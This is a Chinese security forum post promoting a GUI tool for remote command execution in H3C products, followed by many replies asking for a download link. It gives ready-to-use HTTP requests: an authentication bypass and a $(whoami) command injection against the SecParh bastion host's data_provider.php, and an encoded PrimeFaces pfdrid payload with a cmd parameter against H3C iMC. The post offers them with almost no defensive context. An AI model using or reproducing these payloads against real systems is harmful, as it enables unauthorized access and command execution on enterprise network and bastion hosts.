H3C IMC 远程命令执行图形化利用工具

82303224 · 2022 年4 月 22 日 07:19

漏洞名称1：H3C SecParh堡垒机 data_provider.php 远程命令执行漏洞
影响对象：H3C SecParh堡垒机
系统界面：

任意用户登录

GET：/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin

命令执行payload：（whoami–>command）
GET：/audit/data_provider.php?ds_y=2019&ds_m=04&ds_d=02&ds_hour=09&ds_min40&server_cond=&service=$(whoami)&identity_cond=&query_type=all&format=json&browse=true

漏洞名称2：H3C IMC rce
影响对象：H3C iMC智能管理中心
系统界面：

使用hackbar插件：

POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml
data：pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=whoami

命令执行payload：（whoami–>command）

1049106612 · 2022 年4 月 22 日 14:14

大佬，给个链接

wusuo · 2022 年4 月 23 日 11:11

下载地址，谢谢

autohere · 2022 年4 月 23 日 13:25

师傅给个下载连接

KevolT · 2022 年5 月 7 日 08:42

师傅，给个下载地址

attack · 2022 年5 月 15 日 16:08

师傅！求一个链接！爱你么么哒

sjdalu · 2022 年5 月 16 日 05:23

师傅，给个下载地址

bugscan · 2022 年5 月 27 日 03:09

铁汁，求地址。

XXXX · 2022 年5 月 28 日 06:02

大佬，来个下载地址

alert-zero · 2022 年6 月 16 日 04:59

师傅，给个连接

lihua1 · 2022 年7 月 2 日 12:08

老铁给个链接

gummybears · 2022 年7 月 5 日 01:21

求下载地址

wsssss · 2022 年7 月 13 日 08:24

师傅，给个下载地址

994273352 · 2022 年7 月 21 日 07:46

老哥给个链接下一份！谢谢！

jasonjiang · 2022 年8 月 17 日 03:17

下载地址

milaicai · 2022 年8 月 22 日 13:53

大哥给个下载地址

hackshy · 2022 年10 月 3 日 09:26

L师傅来个下载地址呀。

dpb · 2022 年10 月 8 日 01:44

师傅，给个链接

dpb · 2022 年10 月 8 日 01:47

下载地址

baobao · 2022 年10 月 17 日 09:26

求个下载地址老铁